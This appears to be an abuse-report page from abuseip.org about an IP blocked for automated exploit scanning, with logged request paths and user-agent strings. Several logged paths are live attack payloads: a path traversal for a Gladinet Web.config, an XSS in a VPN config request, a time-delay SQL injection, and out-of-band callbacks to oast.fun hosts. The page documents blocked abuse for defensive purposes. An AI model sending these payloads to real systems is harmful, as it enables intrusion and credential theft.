abuseip.org

IP 66.94.121.33 is currently blocked by the redirs.com anycast edge.

Reason: suspicious paths across 1 domains
Hits (last hour): 211
Unique targets hit: 3
Unique paths probed: 3,775
Detection count: 14
First seen: 2026-05-12 06:04:04 UTC
Last seen: 2026-05-12 06:36:40 UTC
Block expires: 2026-05-13 07:19:12 UTC

Sample paths probed

/wp-json/lp/v1/load_content_via_ajax
/signin
/storage/t.dn?s=..%5C..%5C..%5CProgram+Files+(x86)%5CGladinet+Cloud+Enterprise%5Croot%5CWeb.config&sid=1
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
/wp-content/plugins/sureforms/readme.txt
/melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm
/wp-json/wp/v2/pages?per_page=100
/wp-content/plugins/export-wp-page-to-static-html/README.txt
/wp-admin/admin-ajax.php
/Doc/WebLogin.asp
/api/remote
/
/user/list
/C6/Jhsoft.Web.departments/GetTreeDate.aspx/?id=1;WAITFOR+DELAY+'0:0:6'--
/auth/login
/API/regionsDiscovery.php?master=spark%3A%2F%2Fd81c63aardbs6dvsdkn07aouj9amd5igs.oast.fun:443&mask=26&project=your_project&devices=device1%2Cdevice2&mtserver=127.0.0.1%3A3306&mtuser=root&mtpassword=paloalto&task-id=1193&mode=pre-analysis&regions&parquetPath=%2Ftmp&timezone=Europe%2FHelsinki&mlserver=127.0.0.1&debug=false&initDate=2023-01-01&endDate=2023-01-31
/API/regionsDiscovery.php?master=spark%3A%2F%2Fd81c63aardbs6dvsdkn0ztgnnrwo7yre4.oast.fun:443&mask=26&project=your_project&devices=device1%2Cdevice2&mtserver=127.0.0.1%3A3306&mtuser=root&mtpassword=paloalto&task-id=1193&mode=pre-analysis&regions&parquetPath=%2Ftmp&timezone=Europe%2FHelsinki&mlserver=127.0.0.1&debug=false&initDate=2023-01-01&endDate=2023-01-31
/cms/collect/getArticle
/dms/services/ServerUI
/modules/pwd.html

Sample User-Agents

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/14.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15
Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:70.0) Gecko/20100101 Firefox/70.0
Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.6
Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; es-es) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36

What does this mean?

This address sent traffic that the redirs.com edge classified as automated abuse — typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).

If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.